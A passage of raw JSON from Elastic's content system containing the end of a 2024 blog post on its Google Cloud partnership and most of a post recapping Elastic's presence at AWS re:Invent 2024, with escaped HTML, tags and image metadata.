Elastic protects collectible digital artwork and NFTs\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/flockx\"\u003e\u003cspan style='font-size: 12pt;'\u003eFlockx AI is on a mission to lift people out of loneliness with help from Elastic on Google Cloud\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/consensus\"\u003e\u003cspan style='font-size: 12pt;'\u003eConsensus upgrades academic research platform with advanced semantic search and AI tools from Elastic on Google Cloud\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/global-rideshare-company\"\u003e\u003cspan style='font-size: 12pt;'\u003eGlobal Rideshare Company improves detection of cyber threats to business data by 300% using Elastic on Google Cloud\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/customers/wepay\"\u003e\u003cspan style='font-size: 12pt;'\u003ePayments innovator uses Elastic Observability and Google Cloud to cut issue detection time, improving application performance for customers and accelerating new products\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Looking ahead","_metadata":{"uid":"cs3ef45dcdd5409a85"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOur partnership with Google Cloud is founded on a shared vision of empowering organizations to maximize the potential of their data. As we look into the future, we are excited to innovate and deliver solutions that help customers take advantage of the cloud and GenAI capabilities.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eStay tuned for more exciting advancements from Elastic and Google Cloud in 2025 as we continue to innovate and expand upon our joint successes!\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs75d713d6ecbacc5b"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6a25ffa4ee53210e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2819072a02f2f79a"}}}],"publish_date":"2024-12-18","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[{"_version":1,"locale":"en-us","uid":"blt39140cf3e2cd4550","ACL":{},"created_at":"2023-11-06T21:51:00.583Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"integrations","label_l10n":"Integrations","tags":[],"title":"Integrations","updated_at":"2023-11-06T21:51:00.583Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.083Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"bltc3067ddccda555c1","ACL":{},"created_at":"2023-11-06T21:50:08.806Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"elastic-cloud","label_l10n":"Elastic Cloud","tags":[],"title":"Elastic Cloud","updated_at":"2023-11-06T21:50:08.806Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.096Z","user":"blt4b2e1169881270a8"}}],"tags_industry":[],"tags_partner":[{"uid":"blt4dcd56f8b3372448","_content_type_uid":"tags_partner"}],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt0e7c39f65cbd3755","ACL":{},"created_at":"2023-11-06T20:37:20.943Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"data-ingestion","label_l10n":"Data ingestion","tags":[],"title":"Data ingestion","updated_at":"2023-11-06T20:37:20.943Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.173Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","title":"Google Cloud","label_l10n":"Google Cloud","keyword":"google-cloud","hidden_value":false,"tags":[],"locale":"en-us","uid":"bltbf617849beaf10fe","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:39:59.168Z","updated_at":"2023-11-06T20:40:14.658Z","ACL":{},"_version":2,"publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T05:40:39.796Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt9085022a5c6c87e9","ACL":{},"created_at":"2023-11-06T20:41:57.778Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"large-language-models","label_l10n":"Large language models","tags":[],"title":"Large language models","updated_at":"2023-11-06T20:42:13.486Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:28.432Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt240c2986db0ba465","ACL":{},"created_at":"2023-11-06T21:31:10.051Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"search-applications","label_l10n":"Search applications","tags":[],"title":"Search applications","updated_at":"2023-11-06T21:31:10.051Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.331Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltb4928f8cf10d2cff","ACL":{},"created_at":"2023-11-06T21:35:16.245Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"vector-search","label_l10n":"Vector search","tags":[],"title":"Vector search","updated_at":"2023-11-06T21:35:16.245Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:22.491Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltefbcf6957c5e689a","ACL":{},"created_at":"2023-11-06T20:35:45.445Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-search","label_l10n":"Cloud search","tags":[],"title":"Cloud search","updated_at":"2023-11-06T20:35:45.445Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:40:50.742Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt2d51fc8cada40465","ACL":{},"created_at":"2023-11-06T20:35:57.040Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud-security","label_l10n":"Cloud security","tags":[],"title":"Cloud security","updated_at":"2023-11-06T20:35:57.040Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt920fd113a20929a5","ACL":{},"created_at":"2023-11-06T20:38:46.745Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ecommerce-search","label_l10n":"Ecommerce search","tags":[],"title":"Ecommerce search","updated_at":"2023-11-06T20:38:46.745Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:33:19.165Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[{"_version":2,"locale":"en-us","uid":"bltcb543cd010a1e2a8","ACL":{},"created_at":"2020-06-17T03:33:30.831Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"cloud","label_l10n":"Cloud","tags":[],"title":"Cloud","updated_at":"2020-07-06T22:20:17.019Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:05:21.552Z","user":"blt4b2e1169881270a8"}}],"thumbnail_image":{"uid":"blt9d86cc82dbfbaee3","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-18T15:41:28.897Z","created_by":"bltb6c155cd84fc0c1a","file_size":"179703","filename":"149841_-_Elastic_-_Blog_Image_1.jpg","parent_uid":null,"tags":[],"title":"149841 - Elastic - Blog Image_1.jpg","updated_at":"2024-12-18T15:41:28.897Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T16:00:00.976Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9d86cc82dbfbaee3/6762ed28cbd7d6d90d15e3ec/149841_-_Elastic_-_Blog_Image_1.jpg"},"title":"Elastic and Google Cloud in 2024: Celebrating innovation and progress","title_l10n":"Elastic and Google Cloud in 2024: Celebrating innovation and progress","updated_at":"2024-12-18T15:49:22.063Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-google-cloud-2024","publish_details":{"time":"2024-12-18T16:00:00.900Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltb5599649f06d52d1","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"View our top moments at AWS re:Invent and our collaboration with AWS to better serve customers in 2024. Receiving the AWS Partners Global Generative AI Infrastructure and Data Partner of the Year award is a testament to our symbiotic relationship. ","author":["blt39dee51344f15656","blt2700f2cd4144f608","blt5913558de3429222","bltaa54ae292cfe6daa"],"category":["bltc17514bfdbc519df"],"created_at":"2024-12-18T14:41:34.740Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs93b3b0e1757ccf7d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLast week, more than 60,000 AWS enthusiasts, experts, and practitioners attended the weeklong AWS re:Invent conference in Las Vegas while exploring the latest innovations, networking, and learning from 2,000+ sessions.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAWS re:Invent is the tech world's blockbuster event. As a Diamond Sponsor, Elastic was pumped to dive in and connect with IT leaders, customers, and the AWS partner ecosystem.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eOur booth was buzzing with incredible energy, drawing massive crowds of AWS re:Invent attendees eager to learn more about our solutions and engage with our team — maybe you were one of them! This provided ample opportunity to showcase how our users can build transformative applications, proactively resolve observability issues, and address complex security threats — all with the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/partners/aws\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Search AI Platform on AWS\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThis blog highlights our top moments at AWS re:Invent and our collaboration with AWS to better serve customers in 2024.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs05b2004be82bf029"}}},{"image":{"image":{"uid":"blt60c0a82158165c81","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-18T14:33:52.401Z","created_by":"bltb6c155cd84fc0c1a","file_size":"488097","filename":"image7.jpg","parent_uid":null,"tags":[],"title":"image7.jpg","updated_at":"2024-12-18T14:33:52.401Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T15:58:00.641Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt60c0a82158165c81/6762dd50cbd7d6ff9e15e318/image7.jpg"},"_metadata":{"uid":"cs748b54753dad122e"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Elastic at AWS re:Invent 2024","_metadata":{"uid":"cse9a05e2d2ae4c3fa"},"header_style":"H2","paragraph_l10n":""},{"title_l10n":"Key moments","_metadata":{"uid":"csbcf4b6a80dd492df"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAWS Partners Global Generative AI Infrastructure and Data Partner of the Year: A testament to our symbiotic relationship\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eElastic was grateful to receive the \u003c/span\u003e\u003ca href=\"https://www.businesswire.com/news/home/20241203160358/en/Elastic-Awarded-a-2024-AWS-Partner-Award\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eAWS Global Generative AI Infrastructure and Data Partner of the Year Award\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. This award recognizes top technology partners with the Generative AI Competency that support vector embeddings data storage and management.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs the award winner, it was the perfect opportunity to celebrate the culmination of our joint investment, innovation, and co-engineering with AWS and how our collaboration helps customers develop and scale their generative AI (GenAI) capabilities.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs2f080175a4119530"}}},{"image":{"image":{"uid":"bltc1cbfb6d03e8ae01","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T14:34:09.246Z","created_by":"bltb6c155cd84fc0c1a","file_size":"832590","filename":"image8.png","parent_uid":null,"tags":[],"title":"image8.png","updated_at":"2024-12-18T14:34:09.246Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T15:58:00.716Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltc1cbfb6d03e8ae01/6762dd61ad0534d8f92c1f0d/image8.png"},"_metadata":{"uid":"csc4dd65382fd44c1d"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Announcements","_metadata":{"uid":"cs79b5106756f10d54"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eGeneral availability of Elastic Cloud Serverless on AWS\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eOur most exciting announcement at the event was the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-cloud-serverless\"\u003e\u003cspan style='font-size: 12pt;'\u003egeneral availability of Elastic Cloud Serverless on AWS\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. Powered by a rearchitectured Elasticsearch that is built on an industry-first Search AI Lake optimized for real-time applications, it combines vast storage with low-latency querying and all of the strengths of Elasticsearch’s AI and search capabilities. It’s also \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-cloud-serverless-new-aws-regions\"\u003e\u003cspan style='font-size: 12pt;'\u003eavailable in four different AWS regions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eBlogs\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-serverless-now-ga\"\u003e\u003cspan style='font-size: 12pt;'\u003eElasticsearch Serverless\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e — built on a new stateless architecture — is fully managed so that you can get projects started quickly without operations or upgrades. It also gives you access to the latest vector search and generative AI capabilities.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-security-on-cloud-serverless\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Security on Elastic Cloud Serverless\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e empowers security teams to get up and running quickly, complementing existing options for on-premises, hybrid cloud, and multicloud infrastructures. This unmatched versatility ensures that your strategy can adapt with evolving business needs.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-observability-serverless\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Observability on Elastic Cloud Serverless\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e enables site reliability engineers (SREs) to monitor and optimize their environments with ease. Our Search AI Lake — with its cloud-native architecture — separates compute and storage allowing SREs to scale telemetry ingest, optimize storage, and use advanced AI for actionable insights.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/hybrid-geospatial-rag-application-elastic-amazon-bedrock\"\u003e\u003cspan style='font-size: 12pt;'\u003eCrafting a hybrid geospatial RAG application with Elastic and Amazon Bedrock\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e: With Elasticsearch and its vector database, you can build configurable search and trusted GenAI experiences that scale from prototype to production fast. This blog post explores how to build a powerful retrieval augmented generation (RAG) system that incorporates geospatial data using Elasticsearch, Amazon Bedrock, and LangChain.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-aws-amazon-cloudwatch-metric-streams\"\u003e\u003cspan style='font-size: 12pt;'\u003eStream AWS metrics to Elastic using Amazon CloudWatch Metric Streams\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e: When you need to extend your monitoring and analytics beyond CloudWatch, integrating CloudWatch with Elastic can be a game changer. This integration offers real-time data streaming to enable faster detection of anomalies, more granular insights, and better operational visibility.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eElastic breakout sessions at AWS re:Invent 2024\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eYaru Lin and William Easton presented \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eElastic Cloud Serverless: A New Stateless Architecture for Speed, Scale, and Cost-Efficiency\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. \u003c/span\u003e\u003ca href=\"https://youtu.be/SvfO2NaYfF4?si=7CDuL2i-7AaBJR19\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eWatch here\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc505ad2d5c70fdcc"}}},{"image":{"image":{"uid":"blt0b1774e65188aba6","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T14:34:20.737Z","created_by":"bltb6c155cd84fc0c1a","file_size":"2164475","filename":"image1.png","parent_uid":null,"tags":[],"title":"image1.png","updated_at":"2024-12-18T14:34:20.737Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T15:58:00.685Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt0b1774e65188aba6/6762dd6c21e066f9f5413067/image1.png"},"_metadata":{"uid":"csbdc2e57d9b00e0be"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd2564c169af52eab"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eJeff Vestal, Uday Thiepireddy, and Ayan Ray presented \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003eBuilding RAG Applications with open source Elasticsearch and Amazon Bedrock\u003c/em\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e. \u003c/span\u003e\u003ca href=\"https://youtu.be/2Qa7PWTrjdY?si=o9GjHm4rRRkVD5O4\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eWatch here\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs4d9d3912736fbf63"}}},{"image":{"image":{"uid":"blte6d4f85ef5a78705","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T14:34:29.761Z","created_by":"bltb6c155cd84fc0c1a","file_size":"2149998","filename":"image9.png","parent_uid":null,"tags":[],"title":"image9.png","updated_at":"2024-12-18T14:34:29.761Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T15:58:00.625Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blte6d4f85ef5a78705/6762dd753f552a3c23e4246d/image9.png"},"_metadata":{"uid":"csd5805d1f5c355303"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs5cb8b8ed8df30a90"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInterviews\u003cbr /\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eElastic CEO Ashutosh Kulkarni sat down with SiliconANGLE and theCUBE for an interview on AI-powered search, governance, large language model (LLM) security, and more. \u003c/span\u003e\u003ca href=\"https://go.es.io/41gxsbV\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eWatch here\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs9800a002c1914487"}}},{"image":{"image":{"uid":"blt4dc716b16ade5719","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T14:34:37.543Z","created_by":"bltb6c155cd84fc0c1a","file_size":"2849619","filename":"image6.png","parent_uid":null,"tags":[],"title":"image6.png","updated_at":"2024-12-18T14:34:37.543Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T15:58:00.771Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4dc716b16ade5719/6762dd7dfbbc1d3adc0981d5/image6.png"},"_metadata":{"uid":"cs13b2315606567d26"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs80076616de9a6115"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAjay Nair, general manager of platform, joined GenAI LIVE! The AWS generative AI partners show streamed live on YouTube straight from the show floor. \u003c/span\u003e\u003ca href=\"https://www.youtube.com/live/8mOp9GMw5hs?si=Va3ZbVZtVH3XAF9A\u0026t=14944\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eWatch here\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf0132e92d5c83a33"}}},{"image":{"image":{"uid":"bltccb6682dc90c5e5d","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-12-18T14:34:57.175Z","created_by":"bltb6c155cd84fc0c1a","file_size":"1780623","filename":"image5.png","parent_uid":null,"tags":[],"title":"image5.png","updated_at":"2024-12-18T14:34:57.175Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-12-18T15:58:00.658Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltccb6682dc90c5e5d/6762dd91cc57be57c203a10d/image5.png"},"_metadata":{"uid":"cs1cc350fa40efe295"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs257fc6d960ad91fd"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDiversity, Equity, and Inclusion (DEI)\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cbr /\u003eTo champion the empowerment of women in the technology sector, Alyssa Fitzpatrick, global VP of partner sales, spoke at the Women in Tech roundtable sponsored by Kyndryl. The session featured diverse perspectives on the unique obstacles women encounter in tech, such as breaking into leadership, combating gender bias, and finding balance between professional and personal 